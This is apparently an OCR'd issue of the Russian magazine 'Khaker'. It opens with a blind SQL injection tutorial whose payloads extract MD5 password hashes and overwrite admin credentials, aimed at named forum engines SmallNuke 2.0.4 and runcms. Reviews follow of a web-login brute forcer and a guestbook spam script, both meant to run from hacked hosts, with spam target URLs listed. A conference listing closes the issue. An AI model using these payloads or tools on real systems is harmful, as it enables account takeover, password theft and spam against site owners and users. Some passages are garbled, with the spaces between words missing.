книги хакеры / журнал хакер / 108_Optimized

Утилита-переборщик

При больших объемах перебора рационально применить метод сравнения с использованием конструкции IN или NOT IN.

SELECT * FROM ‘users’ WHERE ‘id’= ‘1’ and ASCII(SUBSTRING((select password from users where id=1),1,1)) IN(1,2,4,5)-- -> 0

SELECT * FROM ‘users’ WHERE ‘id’= ‘1’ and ASCII(SUBSTRING((select password from users where id=1),1,1)) IN(51,52,53)-- -> 1

Выполнив этот запрос, мы убеждаемся, что первый символ MD5 пароля входит в цифровой диапазон 3-5 (не забывай, что аргументы IN — это не значения, а их ASCII-коды!).

Однако у этого метода по скорости выигрывает BETWEEN, так как он выполняется за меньшее количество тактов.

Эксплойты для перебора пароля

SELECT * FROM ‘users’ WHERE ‘id’= ‘1’ and ascii(substring((select password from users where id=1),1,1)) BETWEEN 1 and 5-- -> 0

SELECT * FROM ‘users’ WHERE ‘id’= ‘1’ and ascii(substring((select password from users where id=1),1,1)) BETWEEN 51 and 55-- -> 1

Тебе решать, какой метод использовать.

В конечном счете наша задача сводится к обнаружению некоторого среза кодов, в который входит искомый символ, и последующему сравнению символа с каждым кодом в этом срезе.

Далее подбирается второй символ, затем третий...

пока не дойдем до последнего. Зато в итоге мы получим полноценный MD5 хэш, без явного отображения данных на экране!

INSERT’ные трюки

Как я уже сказал, универсальность метода перебора заключается в том, что он работает независимо от вида оператора (SELECT, INSERT, UPDATE, DO, DELETE или SET). Чтобы не быть голословным, приведу пример с бажным INSERT. Предположим, что в уязвимом скрипте, отвечающем за регистрацию нового юзера форума (а таких сценариев в Сети, поверь мне, великое множество), имеется запрос вида:

$query = ‘INSERT INTO ‘users’ (id, username, password) VALUES (\’’.$_GET[‘id’].’\’,\’example\’,\’’. md5(‘example’).’\’);’;

Наша задача, в первую очередь, определить истинность или ложность выполнения инжектированного запроса. Чтобы искусственно вызвать ошибку, попробуем использовать оператор IF вкупе с левым подзапросом «SELECT 1 UNION SELECT 2». Для организации задуманного нужно лишь указать в качестве уязвимого параметра id злую строку вида «‘1’,’example’,1 =IF(ASCII(1)=48,1,(SELECT 1 UNION SELECT 2)))/*». И тут же получить ошибку: «Subquery returns more than 1 row». Впрочем, существует и благоприят-

ный исход событий, если сравнивать единичку с ее истинным кодом 49:

INSERT INTO ‘users’ (id,username,password) VALUES (‘1 ’,’example’,1=IF(ASCII(1)=48,1,(SELECT 1 UNION SELECT 2)))/* -> 0

INSERT INTO ‘users’ (id,username,password) VALUES (‘1 ’,’example’,1=IF(ASCII(1)=49,1,(SELECT 1 UNION SELECT 2)))/* -> 1

ON DUPLICATE KEY

Фактуязвимостискриптамыустановили.Теперьследуетаккуратнопроэксплуатироватьдвижок,заменивлогинипарольадминистраторанашими значениями:).НачинаясверсииMySQL4.1,работаетзамечательная конструкция«ONDUPLICATEKEY»,котораяпривыполненииINSERT’aс указаниемспециальныхпараметровчудеснымобразомделаетнеINSERT,а целыйUPDATE!Рассмотримэтотнедокументированныйприемнапрактике. Представим, что табличка users имеет следующую структуру:

‘name’ varchar(60) NOT NULL default ‘’, ‘password’ varchar(32) NOT NULL default ‘’, ‘email’ varchar(60) NOT NULL default ‘’, ‘joindate’ int(10) unsigned NOT NULL default ‘0’, PRIMARY KEY (‘name’)

) ENGINE=MyISAM DEFAULT CHARSET=utf8;

Процедура добавления нового юзера происходит примерно так:

INSERT INTO ‘users’ ( ‘name’ , ‘password’ , ‘email’ , ‘joindate’ ) VALUES ( ‘underwhater’,’testeng’ , ‘ge@ ma.ru’ , ‘12.12.2007’)

При инжектировании указанного запроса нужно использовать конструкцию «ON DUPLICATE KEY UPDATE поле=значение», в результате которого мы обновим значения нужных нам полей:

INSERT INTO ‘users’ ( ‘name’ , ‘password’ , ‘email’ , ‘joindate’ ) VALUES ( ‘underwhater’,’testeng’ , ‘ge@ ma.ru’ , ‘12.12.2007’) ON DUPLICATE KEY UPDATE ‘name’= ’gemaglabin’,’password’=’mafia’-- ‘,’testeng’ , ‘ge@ ma.ru’ , ‘12.12.2007’)

В итоге мы имеем администратора gemaglabin (а не underwater) с собственным паролем.

Но основная фишка этой конструкции состоит в том, что с ее помощью можно легко апдейтить другие таблицы. Скажем, при известной структуре БД и наличии достаточных прав мы можем легко изменить админский пароль соседнего движка, подвязанного к той же базе :). Не веришь? Смотри сам:

INSERT INTO ‘users’ (‘name’, ‘password’, ‘email’ , ‘joindate’ ) VALUES ( ‘underwhater’,’testeng’ , ‘ge@ ma.ru’ , ‘12.12.2007’) ON DUPLICATE KEY UPDATE table2. admin_pass = ‘underWHAT?!’

BENCHMARK

ПришловремяпоговоритьозагадочнойфункцииBENCHMARK.Обычно хакерыиспользуютеедляанализазапросов,когданедаетрезультатов дажевариантсподзапросами.МетодсBENCHMARKвпервыеописал1dt. w0lf(бывшийведущийHack-Faq).Вдальнейшемимбылиширокораскрыты возможностиэтогоспособавегомануалепоbenchmark-инъекциям.Суть методапримернотакова:используяIFвспециальнойконструкции,мымо- жемзаставитьMySQLпроизводитькакие-тодействиявслучаеправильного запросаи,замеряявремяответаотсервера,судитьобистинностизапроса. Время,котороеприэтомзатрачиваетMySQL,—этовремя,израсходованное наклиента,анепотраченноецентральнымпроцессором.ПоэтомурекомендуетсявыполнятьBENCHMARKнесколькораз,чтобыубедитьсявправильностизаданногоусловиявзависимостиотразличнойнагрузкипроцессора. BENCHMARK сильно загружает процессор, и поэтому выполнять его стоит только при верном запросе, так как количество удачных попыток перебора куда меньше, чем неудачных, да и время выполнения запроса оставляет желать лучшего (на работу эксплойта может уйти больше часа). Также следует грамотно настроить параметр COUNT функции BENCHMARK, так как для каждого сервера он будет разным. К примеру, проверка MD5 хэша админского пароля с явно указанным test выглядит примерно так:

SELECT ‘pass’ FROM ‘users’ WHERE ‘login’ = ‘’ or 1 = if (ascii(1)=49,1,benchmark(999999,md5(‘test’)))--

По времени отклика ты узнаешь, верный пароль или нет.

Forexample

Ура! Мы рассмотрели все методы на практике. Теперь перейдем к их программной реализации и сразу глянем на продукт SmallNuke. На момент написания статьи последняя версия была 2.0.4. В файле modules/ members/lost_pass.php можно легко нащупать blind SQL-injection при высылке забытого пароля.

$username = trim (strip_tags ($_POST[‘username’])); $user_email = trim (strip_tags ($_POST[‘user_email’])); if (($username != "") AND ($user_email == "")) { $where_dat = "username = ‘$username’";

}elseif (($username == "") AND ($user_email != "")) { $where_dat = "user_email = ‘$user_email’";

}elseif (($username != "") AND ($user_email != "")) { $where_dat = "username = ‘$username’ AND user_email = ‘$user_email’";

}elseif (($username == "") AND ($user_email == "")) { header ("Location: index.php?go=Members&in=lost_ pass");

exit;

...

$sql = "SELECT * FROM ".SN_MEMBERS_TABLE." WHERE $where_ dat";

Нас вполне устроит подстановка инъекции в поле user_email. Для этого немного поэкспериментируем с запросами. Подставляем значение «‘ AND ASCII(1)=48/*» в поля email’а пользователя и видим редирект на страницу с ошибкой.

При этом запрос, выполнившийся на сервере, примет следующий вид.

SELECT * FROM ‘users’ WHERE user_email = ‘’ AND

ASCII(1)=48/*

ИзменимзначениеASCII(1)на49иприподстановкеизмененногозапроса увидимсообщениеобуспешнойотправкеновогопаролянаemailпользователя.Однаконастакойвариантнеустраивает,посколькуэтонифигане по-хакерски:).Попробуемвытащитьхэшадминистраторапосимвольным перебором.Дляэтоговставимвкачествеинъекцииследующуюконструкцию:

123’ or ASCII(SUBSTRING((select password from sn_admins where admin_id=1),1,1))=49/*

Та же ситуация имеет место с оператором DELETE. На примере известного проекта runcms это выглядит следующим образом: при получении клиентского IP-адреса проверяется лишь заголовок X-FORWARDED-FOR, однако CLIENT-IP хоть и не проверяется, но учитывается.

runcms/class/core.php 130: if (getenv("HTTP_ X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_ FORWARDED_FOR"), "unknown"))

runcms/class/core.php 135: elseif (getenv("HTTP_ CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) modules\newbb_plus\class\class.whosonline.php (32): $sql = "DELETE FROM ".$bbTable[‘whosonline’]." where timestamp<».(time()-300 OR user_ip=’"._REMOTE_ADDR."’";

После некоторых манипуляций ядовитый запрос принимает подобающий вид. Главное условие его успешного выполнения — существование в таблице хотя бы одной сессии (иначе подзапрос не выполнится).

123’ or 1=IF(ASCII(SUBSTRING((select pass from users where uid=1),1,1))=49,0,(select 1 union select 5))/*");

Работа сканера PHP-багов

проги основана на сканировании различных функций и переменных в сорцах PHP-скриптов, которые могут быть задействованы при проведении веб-атак. Тулза умеет очень многое, вот лишь краткий перечень возможностей сканера:

•возможность сканирования множества файлов или одного скрипта;

•система пресетов: можно вручную добавлять новые функции, изменять или удалять их;

•возможность загрузки и сохранения своих пресетов;

•семь специальных пресетов, сгруппированных по категориям:

code execution command execution directory traversal globals overwrite include SQL-injection miscellaneous;

•сохранение и загрузка результатов;

•сортировка результатов по имени скрипта, номеру строки или функции, которая была найдена;

•быстрый обзор скрипта с подсветкой кода и пронумерованными строками;

•вычисление хэшей Zend_hash_del_key_ or_index;

•String 2 chr() converter — представ-

ление строки в виде ASCII-символов в соответствии с синтаксисом PHP.

Кроме того, софтина обладает удобным гуишным интерфейсом и опциями активации/отключения анализа тех или иных уязвимостей. Все это делает процесс сканирования PHP-движков почти полностью автоматизированным. Почему почти? Да потому, что необходимость в собственных мозгах и прямых руках еще никто не отменял :). А тулза — она свою работу сделает, и сделает хорошо, будь уверен :).

Программа: Fields Brute ОС: Win/*nix

Автор: NOmeR1

Подбор аккаунтов

Об универсальности и автоматизированности пишется постоянно и помногу. Так сложилось, что в этот раз тебе повезло — в нынешнем новогоднем выпуске X-Tools тебя ждет еще один сюрприз под названием Fields Brute. Тулза является универсальным (подчеркиваю это сладостное слово :)) брутером веб-форм авторизации. Это означает, что она способна брутить аккаунты к большинству сайтов, где используется веб-авториз. Причем никаких лишних телодвижений от тебя не требуется, достаточно выполнить следующие действия:

1.Залить файлы из архива на хост с поддержкой сокетов (читай: ломаный шелл).

2.Выставить файлам BAD.txt, GOOD. txt права на запись (chmod 777).

3.Залить в файлик passwds.txt словарь паролей для брута.

4.Запустить index.php, заполнить все поля и нажать Submit, после чего скрипт начнет брут, а мы сможем пойти попить пиво :).

Скрипт умеет работать с GET- и POST-запро- сами, а при желании ты можешь дописать брут по логин-листу. Конечно, существует один внушительных размеров минус — однопоточность скрипта, но его с лихвой компенсирует стабильная работа брутера. Ведь что главное для подобного софта? Правильно, надежность. Поэтому настоятельно рекомендую запускать Fields Brute с серверов, админы которых находятся в запое все 365 дней в году :).

Программа: Checker kidala.info ОС: Win/*nix

Автор: demonoid

О том, что Сеть давно превратилась в место для взаимовыгодных расчетов, сегодня знают все.

Оно и понятно, при соблюдении определенных мер безопасности (о которых, кстати, в ][ писалось уже не раз) в онлайне можно не только продавать «специфические» товары, но и предоставлять не менее «специфические» услуги :). Рай, не правда ли?

Вот только и в этой бочке с медом есть ложка дегтя — кидалы. Не спорю, кидалы есть везде: и в реале, и в Сети — так устроен мир (если где-то убыло, значит где-то прибыло :)). Однако в Сети кинуть напарника/партнера при проведении сделки куда проще. Посуди сам, скорее всего, риппера и искать-то не будут, не говоря уже о привлечении к ответственности. В этом плане хоть как-то защищены приватные ресурсы, на которых функционирует система поручительства. А как быть, если заказчик/ клиент стучит к тебе в асю, представляясь малознакомым ником? Вот здесь-то тебе и помогут такие проекты, как www.kidala.info

и пара аналогичных ресурсов (Гугл в зубы :)). Огорчает одно: заходить каждый раз на тот же www.kidala.info порой обламывает, а искать там асю/ник ленятся даже самые настойчивые. Для облегчения парсинга базы кидал

Чекаем базу кидал

был написан Антириппер-Бот, который висит на уине 455506. Но и здесь присутствует одно жирное но: бот часто уходит в оффлайн :(. Видимо, именно это и побудило чела с загадочным ником demonoid накатать простенький, но чрезвычайно полезный Perl-чекер для www.kidala.info. Скрипт состоит буквально из десятка строк кода и активно юзает LWP. При старте чекера в консольке можно наблюдать параметры его запуска:

C:\>r.pl

kidala.info ~/Black-list THREW in the internet (Black List)/

То есть, для того чтобы чекнуть по базе кидал человека с асей 332065167, следует вбить:

C:\>r.pl 332065167

В ответ скрипт выдаст тебе следующую инфу:

More information: http://332065167.kidala.info/

Как видишь, все данные предоставляются в удобочитаемом виде. Кроме того, запускать скрипт можно как на никсовом шелле, так и в Винде, естественно, при наличии установленного Perl’а. Так что мой тебе совет: юзай Checker kidala.info — дай отпор рипперам! :)

Программа: PHP Spam Guest ОС: Win/*nix

Гостевые книги - излюбленное место спамеров

О спаме по гестам в этом выпуске X-Tools я уже писал. Тем не менее спешу снова порадовать тебя :). Все дело в том, что один из моих знакомых не поленился скинуть мне замечательную спамилку гостевух под названием PHP Spam Guest. Написана она на PHP и представляет собой пару скриптов: spam.php и sobr.php. Кроме того, в каталоге располагается файлик index. html, содержащий в себе менюшку спамилки и bases.dat — базу с линками на гесты. Перед началом постинга тебе предлагается заполнить следующие поля:

1.Your Name

2.E-Mail

3.URL

4.City

5.State:

6.Country

7.Comments

Причемполятребуетсязаполнятьчетким,читабельнымтекстом(нечегоотрукиразмазывать:)). Крометого,скриптспамитгостевыекнигиформата addguest.htmlиaddguest.htm,следовательно,ив базеслинкамиbases.datлежатссылкитакоговида:

www.childrensbooksonline.org/

guestbook/addguest.html

www.df.lth.se/~afro/jeff/

guestbook/addguest.html

www.bpc.org/wpc/guestbook/

addguest.html www.irieman-talma.com/guestbook/ addguest.html

Несмотря на то что спамилка не является универсальной в своем роде, она вполне работоспособна. Так что теперь ничего не мешает хакеру залить скрипты на ломаный хост и с легкой руки запустить постинг :).z

Илья Александров

/ aleksandrov.i@gameland.ru

Что: Linuxworld Conference and Expo

Где: Сан-Франциско, США Когда: 4-7 августа

Сайт: www.linuxworldexpo.com/live/12

Любители Слаки, красноглазные Gentoo’шники, многочисленные убунтовцы и остальные активисты движения имени Линуса Торвальдса

— эти мероприятия проводятся специально для них, чтобы они не умерли за компьютером, десятый раз за ночь пересобирая kernel. Сморщив нос и всем видом демонстрируя синдромы пищевого отравления, могут прийти BSD’шники для общения с «братьями меньшими».

Калифонийский форум — самое, наверное, масштабное собрание фанатов тукса.

Что: CeBIT 2008

Где: Ганновер, Германия Когда: 4-9 марта

Сайт: www.cebit.de

Это настоящая Мекка для техноманьяков и просто неравнодушных к IT людей. Самое крупное мероприятие. CeBIT образовался в начале шестидесятых годов в чудном городе Ганновер как часть торговой

выставки. В 1986 м он набрал такую популярность, что стал проводиться как самостоятельное мероприятие.

В начале века за CeBIT окончательно закрепляется статус самой массовой выставки технологий. Сюда с конкретной целью вложения денег в проекты приезжают топ-менеджеры. Сюда едут разработчики, которым эти деньги ох как нужны. Компании разбиты по секторам в зависимости от направления их деятельности. Километры техники. Чтобы выделиться среди конкурентов, компании выставляют свои самые экзотические и шокирующие своим дизайном продукты.

Что:HackInTheBox(HITB)2008

Где:Дубай,ОАЭ Когда:14-17апреля

Сайт:www.hackinthebox.org

Если хочется совместить приятное с полезным, HITB — это именно то, что нужно. Когда ж еще ты сможешь искупаться в водах Персидского залива, а потом отдохнуть от палящего солнца, слушая выступления по-настоящему известных специалистов в области IT-безопаснос- ти? Дхиллон Эндрю, организатор конференции, задумывал HITB как элитарное мероприятие для узкого круга лиц, не понаслышке знакомых с хакерской тематикой. Таковым оно является и сейчас — к выступлениям допускаются исключительно профи с именем! Вдвойне приятно, что наряду с прослушиванием выступлений можно принять участие

в ежегодном конкурсе по взлому Capture The Flag «Live Hacking» Competitio, получив в качестве приза вполне реальные тысячи долларов. В прошлом году, кстати, это никому не удалось!

Что: DreamHack

Где: Йенчепинг, Швеция Когда: 20 е числа июня Сайт: www.dreamhack.se

Это не какая-то там выставка, это настоящий компьютерный фестиваль. Самая крупная LAN-вечеринка на планете. В 2004 году число посетителей, зафиксированное в Книге рекордов Гиннесса, составило 5272. Вход

— только со своими компьютерами. Тусовка преимущественно геймерская. Хакеры, конечно, там тоже есть, но киберспортсменов существенно больше. Пати занимает площадь, равную примерно десяти квадратным километрам. Соответственно, если ты посетишь это мероприятие, у тебя как минимум будет 20 метров личного пространства! На DreamHack проводятся турниры по программированию, а также по самым разным компьютерным играм.

Билеты нужно заказываться заранее — ко дню открытия их, как правило, уже не бывает.

Что: Chaos Construction

Где: Санкт-Петербург Когда: последние числа августа Сайт: cc.org.ru

Старейшее демо-пати России. Все хай-тек-маньяки Питера и Москвы. Тут можно посмотреть на раздолбанные Амиги, пересобранные Спектрумы, самопальные Apple II. Пощелкать калькулятор «Микроша». Посмотреть документальные видеофильмы о компьютерных корпорациях и рекламные ролики AMD конца восьмидесятых. Нарисовать голого Гейтса, участвуя в real-time Grafiks. Полюбоваться на то, какие спецэффекты делают кодеры-художники в своих демках. Вооружившись подшивкой журналов «Хакер», не спать двое суток, ломая HackQuest. Или просто напиться возле входа с компьютерщиками и завалиться спать в зале, закрываясь от мерцания LCD-мониторов. Непередаваемая атмосфера IT-единства. Также оргкомитет в начале декабря проводит HackAround. То же самое ЦЦ, только узкоспециализированное, тут никакого рисования, одна сплошная безопасность. Девушкам вход бесплатный, причем они (девушки) есть, и даже красивые.

Что: Infosecurity Moscow

Где: Москва Когда: конец сентября

Сайт: www.infosecuritymoscow.com

Infosecurity — бренд международный. Впервые выставка с таким названием прошла в Лондоне в 1996 году. Сейчас же она ежегодно проводится в десяти странах мира, включая Россию. Организацией мероприятия занимается британская Reed Exhibitions — одна из крупнейших компаний мира, занимающаяся проведением IT-мероприятий.

На Infosecurity можно послушать доклады спецов по информационной безопасности, посетить технические и бизнес-семинары. На выставке представлены самые разные разделы: «Антивирусы», «Безопасность локальных сетей», «Шифрование».

Что: HOPE (Hackers On Planet Earth)

Где: Нью-Йорк, США Когда: 18-21 июля

Сайт: www.hopenumbersix.net

Мероприятие организует легендарный журнал 2600 The Hacker Quarterly. Название переводится как «Хакеры на планете Земля», а большинство участников — люди идейные. Каждый из них по-своему смотрит на современное образование, бешеный рост ведущих мировых корпораций, числа коммерческих хакеров, авторское право и т.д.

Что: Breakpoint 2008

Когда: 21-24 марта Где: Бинген-на-Рейне, Германия

Сайт: http://breakpoint.untergrund.net

Традиционно в марте месяце в немецком Бингене проводится демопати Breakpoint, продолжающее дело культовой Mekka & Symposium. Участников здесь меньше, чем на ASSEMBLY, но именно на Breakpoint вручают почетные награды Scene.org Awards. Так что если ты сценер и Scene.org — твоя страничка по умолчанию, тебе, определенно, здесь будет интересно.

Что: Perl Hackathon

Где: Тель-Авив, Израиль Когда: 1-5 января

Сайт: http://act.perl.org.il

Что: Black Hat USA 2008

Где: Лас-Вегас, США Когда: 2-7 августа Сайт: www.blackhat.com Летний Black Hat

Что: Black Hat Europe 2008

Где: Амстердам, Нидерланды Когда: 25-28 марта

Сайт: www.blackhat.com

Европейская версия Black Hat для тех, кому в США лететь далеко и накладно.

Что: Black Hat USA 2008

Где: Вашингтон, США Когда: 18-21 февраля Сайт: www.blackhat.com

Black Hat — чуть ли не самое важное событие в жизни любого хакера независимо от того, посетил ли он его или нет. Презентации разлетаются в инете в момент! Еще бы: самые свежие x-tools, самые громкие proof-of- concept, самые известные хакеры — все это дорогого стоит.

Что: FOSDEM

Где: Брюссель, Бельгия Когда: 23-24 февраля Сайт: www.fosdem.org/2008

Что: SofTool 2008

Где: Москва Когда: 21-24 октября

Веб-сайт: www.softool.ru

Тусовка отличается тем, что ориентирована на программное обеспечение, а не на железные дела. «Хакер» — один из информационных спонсоров выставки. На «Софтуле» представлены различные технологии управления, раздел о логистике, аутсорсинг, электронное обучение. Тебя же, наверно, более всего заинтересуют разделы LinuxLand и «Информационная безопасность». На Softool проводится традиционная церемония «Продукт года». В 2006 году, например, в конкурсе по безопасности побеждали Zlock 1.2 от SecurIT и РУТОКЕН RF от «Актива». Без доклада очень умных людей об информационных технологиях в России тоже не обойдется.

Что: UKUUG Spring 2008 Conference

Где: Бирмингем, Англия Когда: с 31.03.2008 по 02.04.2008

Сайт: www.ukuug.org/events/spring2008